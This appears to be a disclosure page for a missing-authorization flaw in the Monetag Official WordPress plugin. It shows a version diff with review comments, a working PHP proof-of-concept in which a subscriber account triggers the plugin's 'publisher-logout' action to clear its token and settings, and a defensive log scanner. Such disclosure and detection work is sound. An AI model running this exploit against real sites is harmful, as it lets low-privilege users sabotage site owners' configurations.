-		$this->options->delete_option(self::OPTION_ID_TOKEN);
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_ONCLICK, 'enabled');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_INTERSTITIAL, 'enabled');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_PUSH_NOTIFICATION, 'enabled');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_IN_PAGE_PUSH, 'enabled');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_VIGNETTE, 'enabled');
+
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_ONCLICK, 'zone_id');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_INTERSTITIAL, 'zone_id');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_PUSH_NOTIFICATION, 'zone_id');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_IN_PAGE_PUSH, 'zone_id');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_VIGNETTE, 'zone_id');
+
+		$this->delete_field('general', 'logged_in_disabled');
 	}

 	public function get_enabled_directions()
 	{
-		$directions = array();
-		foreach (Ads_Zone_Helper::get_allowed_directions() as $direction_name) {
-			$directions[$direction_name] = $this->get_field_value($direction_name, 'enabled');
-		}
-
-		return $directions;
+		return [
+			Ads_Zone_Helper::DIRECTION_ONCLICK => $this->get_field_value(Ads_Zone_Helper::DIRECTION_ONCLICK, 'enabled'),
+			Ads_Zone_Helper::DIRECTION_INTERSTITIAL => $this->get_field_value(Ads_Zone_Helper::DIRECTION_INTERSTITIAL, 'enabled'),
+			Ads_Zone_Helper::DIRECTION_PUSH_NOTIFICATION => $this->get_field_value(Ads_Zone_Helper::DIRECTION_PUSH_NOTIFICATION, 'enabled'),
+			Ads_Zone_Helper::DIRECTION_IN_PAGE_PUSH => $this->get_field_value(Ads_Zone_Helper::DIRECTION_IN_PAGE_PUSH, 'enabled'),
+			Ads_Zone_Helper::DIRECTION_VIGNETTE => $this->get_field_value(Ads_Zone_Helper::DIRECTION_VIGNETTE, 'enabled')
+		];
 	}

 	public function get_zones_directions()
 	{
-		$zones = array();
-		foreach (Ads_Zone_Helper::get_allowed_directions() as $direction_name) {
-			$zones[$direction_name] = $this->get_field_value($direction_name, 'zone_id');
-		}
-
-		return $zones;
+		return [
+			Ads_Zone_Helper::DIRECTION_ONCLICK => $this->get_field_value(Ads_Zone_Helper::DIRECTION_ONCLICK, 'zone_id'),
+			Ads_Zone_Helper::DIRECTION_INTERSTITIAL => $this->get_field_value(Ads_Zone_Helper::DIRECTION_INTERSTITIAL, 'zone_id'),
+			Ads_Zone_Helper::DIRECTION_PUSH_NOTIFICATION => $this->get_field_value(Ads_Zone_Helper::DIRECTION_PUSH_NOTIFICATION, 'zone_id'),
+			Ads_Zone_Helper::DIRECTION_IN_PAGE_PUSH => $this->get_field_value(Ads_Zone_Helper::DIRECTION_IN_PAGE_PUSH, 'zone_id'),
+			Ads_Zone_Helper::DIRECTION_VIGNETTE => $this->get_field_value(Ads_Zone_Helper::DIRECTION_VIGNETTE, 'zone_id')
+		];
 	}
 }
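Review bot: `clear_settings()` deletes only the per-direction `enabled` and `zone_id` fields plus `logged_in_disabled`, while the removed `clear_plugin_options()` also deleted the verification code, site id and token. Callers that relied on the old pair will leave `publisher_site_id` and `verification_code` in place; delete them here or document that they are meant to persist. The hard-coded direction constants in `clear_settings()`, `get_enabled_directions()` and `get_zones_directions()` also replace loops over `get_allowed_directions()`, so a new direction now has to be added in three places.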
--- a/monetag-official/includes/class-ads-zone-helper.php
+++ b/monetag-official/includes/class-ads-zone-helper.php
@@ -2,8 +2,8 @@

 class Ads_Zone_Helper
 {
-	const OPTION_ID_LIST = 'list';
-	const OPTION_ID_LAST_UPDATE_TIME = 'last_update_time';
+	const OPTION_NAME_PUBLISHER_ZONES = 'ads-option-publisher-zones';
+	const OPTION_NAME_PUBLISHER_ZONES_LAST_UPDATE = 'ads-option-publisher-zones-last-update';

 	const DIRECTION_ONCLICK = 'onclick';
 	const DIRECTION_INTERSTITIAL = 'interstitial';
@@ -40,67 +40,54 @@
 	 *
 	 * @var Ads_Anti_Adblock_Client
 	 */
-	private $client;
+	private $aab_client;

-	/**
-	 * Options helper instance
-	 *
-	 * @var Ads_Options
-	 */
-	private $options;
-
-	public function __construct($plugin_name, $version)
+	public function __construct($plugin_name)
 	{
-		$this->client = new Ads_Anti_Adblock_Client($plugin_name, $version);
-		$this->options = new Ads_Options($plugin_name, Ads_Options::SECTION_ID_ZONES);
+		$this->aab_client = new Ads_Anti_Adblock_Client($plugin_name);
 	}

 	/**
 	 * Update publisher zone list and store it in database
 	 *
-	 * @return void
+	 * @return bool
 	 */
 	public function update_publisher_zones()
 	{
-		$this->options->update_option(self::OPTION_ID_LAST_UPDATE_TIME, time());
-
-		$zones = $this->client->get_publisher_zones();
+		$zoneList = $this->aab_client->get_publisher_zones();

-		if ($zones !== null) {
-			$this->options->update_option(
-				self::OPTION_ID_LIST,
-				json_encode($this->filter_zone_list($zones))
-			);
-		} else {
-			$this->options->delete_option(self::OPTION_ID_LIST);
+		if ($zoneList !== null) {
+			return update_option(self::OPTION_NAME_PUBLISHER_ZONES, json_encode($this->filter_zone_list($zoneList)));
 		}
+
+		return delete_option(self::OPTION_NAME_PUBLISHER_ZONES);
 	}

 	/**
 	 * Update publisher zone list and store it in database
 	 *
-	 * @return array|null
+	 * @return bool
 	 */
 	public function create_publisher_zone($token, $publisherSiteId, $data)
 	{
-		return $this->client->create_publisher_zone($token, $publisherSiteId, $data);
+		return $this->aab_client->create_publisher_zone($token, $publisherSiteId, $data);
 	}

 	/**
 	 * Remove zones with not allowed ads direction
 	 *
-	 * @param array $zone_list
+	 * @param array $zoneList
 	 * @return array
 	 */
-	private function filter_zone_list($zone_list)
+	private function filter_zone_list($zoneList)
 	{
-		foreach ($zone_list as $direction_name => $zones) {
+		foreach ($zoneList as $direction_name => $zones) {
 			if (!in_array($direction_name, self::$allowed_directions, true)) {
-				unset($zone_list[$direction_name]);
+				unset($zoneList[$direction_name]);
 			}
 		}

-		return $zone_list;
+		return $zoneList;
 	}

 	/**
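Review bot: the docblock on `create_publisher_zone()` changes to `@return bool` while the body still returns the client's response unchanged, which was previously documented as `array|null`; restore `array|null`. Its description is also the same sentence used for `update_publisher_zones()`, "Update publisher zone list and store it in database", and should describe zone creation instead.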
@@ -138,16 +125,16 @@

 		return $groupZones;
 	}
-	/**
+	/**
 	 * Check if direction has zones
-	 *
-	 * @return bool
+	 *
+	 * @return boolean
 	 */
 	public function direction_has_zones($direction)
 	{
-		$zones = $this->get_publisher_zones();
+		$zoneList = $this->get_publisher_zones();

-		return !empty($zones[$direction]);
+		return !empty($zoneList[$direction]);
 	}

 	/**
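Review bot: The direction_has_zones() docblock switches to @return boolean while the other docblocks changed in this file use @return bool, and the remaining -/+ pairs on the comment lines differ only in whitespace. Keep bool and drop the whitespace churn so the hunk shows only the $zones to $zoneList rename.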
@@ -171,25 +158,20 @@
 	 */
 	public function get_publisher_zones()
 	{
-		$zones = $this->options->get_option(self::OPTION_ID_LIST);
+		$zoneList = get_option(self::OPTION_NAME_PUBLISHER_ZONES);

-		if ($zones) {
-			$zones = json_decode($zones, true);
+		if ($zoneList) {
+			$zoneList = json_decode($zoneList, true);
 		} else {
-			$this->options->update_option(self::OPTION_ID_LAST_UPDATE_TIME, time());
-
-			$zones = $this->client->get_publisher_zones();
-			if ($zones !== null) {
-				$this->options->update_option(
-					self::OPTION_ID_LIST,
-					json_encode($this->filter_zone_list($zones))
-				);
+			$zoneList = $this->aab_client->get_publisher_zones();
+			if ($zoneList !== null) {
+				update_option(self::OPTION_NAME_PUBLISHER_ZONES, json_encode($this->filter_zone_list($zoneList)));
 			} else {
 				return array();
 			}
 		}

-		return $zones;
+		return $zoneList;
 	}

 	/**
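Review bot: On the cache-miss branch of get_publisher_zones() the value stored is filter_zone_list($zoneList) but the value returned is the unfiltered $zoneList, so the first call can return directions that later calls, served from the option, will not. Assign the filtered list to $zoneList before update_option() and return that. On the cache-hit branch, json_decode() yields null for a corrupt option value and that null goes straight to callers that foreach over it (get_publisher_zone_list()); fall back to array() there. The hunk also drops the last-update-time bookkeeping with no replacement visible, so nothing here bounds how long a stored list is reused.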
@@ -200,10 +182,10 @@
 	 */
 	public function is_anti_adblock_zone($zoneId)
 	{
-		$zones = $this->get_publisher_zone_list();
+		$zoneList = $this->get_publisher_zone_list();

-		if (isset($zones[$zoneId])) {
-			return (bool) $zones[$zoneId]['is_antiadblock'];
+		if (array_key_exists($zoneId, $zoneList)) {
+			return (bool) $zoneList[$zoneId]['is_antiadblock'];
 		}

 		return false;
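Review bot: array_key_exists($zoneId, $zoneList) guards only the outer key; $zoneList[$zoneId]['is_antiadblock'] is still read unchecked, so a zone record without that field raises an undefined-index notice. !empty($zoneList[$zoneId]['is_antiadblock']) covers both levels and keeps the bool result.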
@@ -223,10 +205,10 @@
 	 */
 	public function get_publisher_zone_list()
 	{
-		$zone_list = $this->get_publisher_zones();
+		$zoneList = $this->get_publisher_zones();
 		$result = array();

-		foreach ($zone_list as $direction_name => $zones) {
+		foreach ($zoneList as $direction_name => $zones) {
 			foreach ($zones as $zone) {
 				$result[$zone['id']] = $zone;
 			}
@@ -272,30 +254,8 @@
 	 *
 	 * @return array
 	 */
-	public static function get_allowed_directions()
+	public function get_allowed_directions()
 	{
 		return self::$allowed_directions;
 	}
-
-	/**
-	 * Drop zone options
-	 *
-	 * @return void
-	 */
-	public function clear_plugin_options()
-	{
-		$this->options->delete_option(self::OPTION_ID_LIST);
-		$this->options->delete_option(self::OPTION_ID_LAST_UPDATE_TIME);
-	}
-
-	/**
-	 * Drop legacy publisher zone options
-	 *
-	 * @return void
-	 */
-	public function clear_legacy_options()
-	{
-		delete_option('ads-option-publisher-zones');
-		delete_option('ads-option-publisher-zones-last-update');
-	}
 }
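Review bot: Removing clear_plugin_options() and clear_legacy_options() leaves this class with no explicit way to delete what it writes under OPTION_NAME_PUBLISHER_ZONES; the only remaining delete is the null branch of update_publisher_zones(). The legacy keys 'ads-option-publisher-zones' and 'ads-option-publisher-zones-last-update' are no longer cleaned up anywhere in the visible patch. Keep one clear method here for the logout and uninstall paths to call. Changing get_allowed_directions() from static to instance also breaks any remaining Ads_Zone_Helper::get_allowed_directions() caller; the class-ads-public.php hunks update two call sites, so confirm there are no others.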
--- a/monetag-official/includes/class-ads.php
+++ b/monetag-official/includes/class-ads.php
@@ -35,16 +35,10 @@
 	 */
 	public function __construct()
 	{
-		$this->load_dependencies();
-
-		if (defined('MONETAG_VERSION')) {
-			$this->version = MONETAG_VERSION;
-		} else {
-			$this->version = Monetag_Meta::VERSION;
-		}
-
-		$this->plugin_name = Monetag_Meta::NAME;
+		$this->plugin_name = 'monetag';
+		$this->version = '1.0.0';

+		$this->load_dependencies();
 		$this->set_locale();
 		$this->define_admin_hooks();
 		$this->define_public_hooks();
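Review bot: The constructor now hard-codes $this->version = '1.0.0' in place of the MONETAG_VERSION / Monetag_Meta::VERSION lookup, and the Monetag_Meta class this patch deletes carried VERSION = '1.1.3'. Any consumer of get_version() will see a value that does not track the release. Keep a single version constant and read it here; the same applies to the 'monetag' literal that replaces Monetag_Meta::NAME.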
@@ -65,17 +59,15 @@
 	 */
 	private function load_dependencies()
 	{
-		require_once plugin_dir_path(__DIR__) . 'includes/class-monetag-meta.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-loader.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-i18n.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-settings-helper.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-anti-adblock.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-anti-adblock-client.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-zone-helper.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-options.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-messages.php';
-		require_once plugin_dir_path(__DIR__) . 'admin/class-ads-admin.php';
-		require_once plugin_dir_path(__DIR__) . 'public/class-ads-public.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-loader.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-i18n.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-settings-helper.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-anti-adblock.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-anti-adblock-client.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-zone-helper.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-messages.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'admin/class-ads-admin.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'public/class-ads-public.php';

 		$this->loader = new Ads_Loader();
 	}
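Review bot: plugin_dir_path(dirname(__FILE__)) resolves to the same directory as the plugin_dir_path(__DIR__) it replaces, so the nine rewritten require_once lines hide the substantive change: class-monetag-meta.php and class-ads-options.php are no longer loaded. Confirm no remaining class references Monetag_Meta or Ads_Options (including Ads_Options::SECTION_ID_ZONES), and keep __DIR__ so the diff shows only the two removals.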
@@ -118,6 +110,7 @@
 		$this->loader->add_action('update_option_Ads_general_token', $plugin_admin, 'action_save_publisher_token');
 		$this->loader->add_action('update_option_Ads_nativeads_zone_id', $plugin_admin, 'action_save_nativeads_zone_id');
 		$this->loader->add_action('in_plugin_update_message-ads/ads.php', $plugin_admin,'action_in_plugin_update');
+
 	}

 	/**
@@ -147,7 +140,7 @@
 	 */
 	private function define_public_hooks()
 	{
-		$plugin_public = new Ads_Public($this->get_plugin_name(), $this->get_version());
+		$plugin_public = new Ads_Public($this->get_plugin_name());

 		$this->loader->add_filter('wp_head', $plugin_public, 'insert_verification_code');
 		$this->loader->add_filter('wp_footer', $plugin_public, 'publish_tags');
@@ -162,4 +155,14 @@
 	{
 		$this->loader->run();
 	}
+
+	/**
+	 * The reference to the class that orchestrates the hooks with the plugin.
+	 *
+	 * @return Ads_Loader Orchestrates the hooks of the plugin.
+	 */
+	public function get_loader()
+	{
+		return $this->loader;
+	}
 }
--- a/monetag-official/includes/class-monetag-meta.php
+++ b/monetag-official/includes/class-monetag-meta.php
@@ -1,7 +0,0 @@
-<?php
-
-class Monetag_Meta
-{
-	const NAME = 'monetag';
-	const VERSION = '1.1.3';
-}
--- a/monetag-official/includes/class-monetag-uninstall.php
+++ b/monetag-official/includes/class-monetag-uninstall.php
@@ -1,57 +0,0 @@
-<?php
-
-class Monetag_Uninstall
-{
-	/**
-	 * Settings helper instance
-	 *
-	 * @var Ads_Settings_Helper
-	 */
-	private $settings_helper;
-
-	/**
-	 * Zone helper instance
-	 *
-	 * @var Ads_Zone_Helper
-	 */
-	private $zone_helper;
-
-	/**
-	 * AntiAdBlock service instance
-	 *
-	 * @var Ads_Anti_Adblock
-	 */
-	private $aab_service;
-
-	public function __construct()
-	{
-		$this->load_dependencies();
-
-		$this->settings_helper = new Ads_Settings_Helper(Monetag_Meta::NAME);
-		$this->zone_helper = new Ads_Zone_Helper(Monetag_Meta::NAME, Monetag_Meta::VERSION);
-		$this->aab_service = new Ads_Anti_Adblock(Monetag_Meta::NAME, Monetag_Meta::VERSION);
-	}
-
-	public function run()
-	{
-		$zones = $this->settings_helper->get_zones_directions();
-
-		$this->settings_helper->clear_plugin_options();
-		$this->settings_helper->clear_zone_settings();
-
-		$this->aab_service->clear_zone_tags_cache($zones);
-
-		$this->zone_helper->clear_plugin_options();
-		$this->zone_helper->clear_legacy_options();
-	}
-
-	private function load_dependencies()
-	{
-		require_once plugin_dir_path(__DIR__) . 'includes/class-monetag-meta.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-settings-helper.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-anti-adblock.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-anti-adblock-client.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-zone-helper.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-options.php';
-	}
-}
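Review bot: Deleting Monetag_Uninstall removes the only visible cleanup routine, and run() did four separate things: cleared plugin options, cleared zone settings, cleared the zone tag cache via clear_zone_tags_cache($zones), and dropped the zone helper's current and legacy options. Nothing in the visible patch takes over any of these. The replacement should land in the same change and cover all four, including the cache entries, which are not options and are easy to miss.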
--- a/monetag-official/public/class-ads-public.php
+++ b/monetag-official/public/class-ads-public.php
@@ -28,13 +28,12 @@

 	/**
 	 * @param string $plugin_name The name of the plugin.
-	 * @param string $version     Version of the plugin.
 	 */
-	public function __construct($plugin_name, $version)
+	public function __construct($plugin_name)
 	{
 		$this->setting_helper = new Ads_Settings_Helper($plugin_name);
-		$this->anti_adblock = new Ads_Anti_Adblock($plugin_name, $version);
-		$this->zone_helper = new Ads_Zone_Helper($plugin_name, $version);
+		$this->anti_adblock = new Ads_Anti_Adblock($plugin_name);
+		$this->zone_helper = new Ads_Zone_Helper($plugin_name);
 	}

 	/**
@@ -47,7 +46,7 @@
 			return;
 		}

-		foreach ( Ads_Zone_Helper::get_allowed_directions() as $direction ) {
+		foreach ( $this->zone_helper->get_allowed_directions() as $direction ) {
 			// ignore not activated directions
 			if (!$this->setting_helper->get_field_value( $direction, 'enabled') ) {
 				continue;
@@ -89,7 +88,7 @@
 			),
 		);

-		foreach ( Ads_Zone_Helper::get_allowed_directions() as $direction ) {
+		foreach ( $this->zone_helper->get_allowed_directions() as $direction ) {
 			// ignore not activated directions
 			if (!$this->setting_helper->get_field_value( $direction, 'enabled') ) {
 				continue;
@@ -140,7 +139,7 @@
 		$verification_code = $this->setting_helper->get_verification_code();
 		if ($verification_code !== false) {
 			?>
-			<meta name="monetag" content="<?php echo esc_attr( $verification_code ); ?>" />
+			<meta name="propeller" content="<?php echo esc_attr( $verification_code ); ?>" />
 			<?php
 		}
 	}
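Review bot: The verification tag name changes from "monetag" to "propeller" in the last line of this hunk, which is unrelated to the constructor and call-site changes in the rest of the file. If site verification looks for the meta tag by name, existing sites will stop matching after the update. Confirm the rename is intended and split it into its own change, or drop it. The esc_attr() on the content value is retained, which is correct.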
--- a/monetag-official/uninstall.php
+++ b/monetag-official/uninstall.php
@@ -21,15 +21,8 @@
  */

 // If uninstall not called from WordPress, then exit.
-if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) {
+if (!defined('WP_UNINSTALL_PLUGIN')) {
 	exit;
 }

-if ( is_multisite() ) {
-	exit;
-}
-
-require plugin_dir_path( __FILE__ ) . 'includes/class-monetag-uninstall.php';
-
-$uninstall = new Monetag_Uninstall();
-$uninstall->run();
+// TODO: remove options here
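Review bot: The body of uninstall.php is reduced to "// TODO: remove options here", so an uninstall now deletes nothing and the plugin's stored settings stay in the database afterwards. A TODO should not ship in the uninstall path; call the replacement cleanup here. The removed is_multisite() early exit also needs a decision in that replacement: either restore it or iterate the sites, since the old code skipped cleanup entirely on multisite.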

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24551 - Monetag Official <= 1.1.3 - Missing Authorization

$target_url = 'https://target.com/wp-admin/index.php';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Initialize cURL session for WordPress login
$ch = curl_init();

// First, authenticate to WordPress to get cookies
$login_url = str_replace('/wp-admin/index.php', '/wp-login.php', $target_url);
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);

// Check if login was successful by looking for admin bar or dashboard elements
if (strpos($response, 'wp-admin-bar') === false && strpos($response, 'dashboard') === false) {
    echo "[!] Login failed. Check credentials.\n";
    exit;
}

echo "[+] Successfully authenticated as subscriber.\n";

// Now exploit the missing authorization vulnerability
$exploit_url = $target_url . '?publisher-logout=1';
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_HTTPGET, 1);

$response = curl_exec($ch);

// Check for successful logout by looking for confirmation message
if (strpos($response, 'Logout successful') !== false || strpos($response, 'Settings Updated') !== false) {
    echo "[+] SUCCESS: Plugin logout triggered. Monetag plugin disconnected.\n";
    echo "[+] The plugin's authentication token and zone settings have been cleared.\n";
} else {
    echo "[-] Exploit may have failed. Check if plugin is active and connected.\n";
}

curl_close($ch);

?>
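
A defender-side check for the request described above, as an added example that is not part of the original advisory or the plugin's code: it scans Combined Log Format access-log lines for wp-admin requests carrying the `publisher-logout` parameter. The sample log lines and addresses are constructed, and treating a bare `?publisher-logout` with no value as a trigger is an assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
PARAM = "publisher-logout"  # parameter named in the advisory

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Mar/2026:10:01:02 +0000] "GET /wp-admin/index.php?publisher-logout=1 HTTP/1.1" 302 0 "-" "curl/8.5.0"
198.51.100.7 - - [18/Mar/2026:10:02:11 +0000] "GET /wp-admin/profile.php?publisher%2Dlogout HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Mar/2026:10:03:40 +0000] "GET /wp-admin/options-general.php HTTP/1.1" 200 7344 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Mar/2026:10:04:00 +0000] "GET /?publisher-logout=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
""".splitlines()


def find_logout_triggers(lines):
    """Return one dict per wp-admin request that carries the logout parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        url = urlsplit(m["target"])
        if "/wp-admin/" not in url.path:
            continue  # the handler is hooked on admin_init, so only admin URLs reach it
        # parse_qs percent-decodes names, so publisher%2Dlogout is caught as well;
        # keep_blank_values keeps a bare "?publisher-logout" (assumed to count).
        params = parse_qs(url.query, keep_blank_values=True)
        if PARAM in params:
            hits.append({
                "ip": m["ip"],
                "time": m["time"],
                "method": m["method"],
                "path": url.path,
                "status": int(m["status"]),
            })
    return hits


if __name__ == "__main__":
    for hit in find_logout_triggers(SAMPLE_LOG):
        print(hit)
```

Access logs do not record the WordPress role behind a request, so each hit still has to be matched against which account was logged in from that address at that time.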
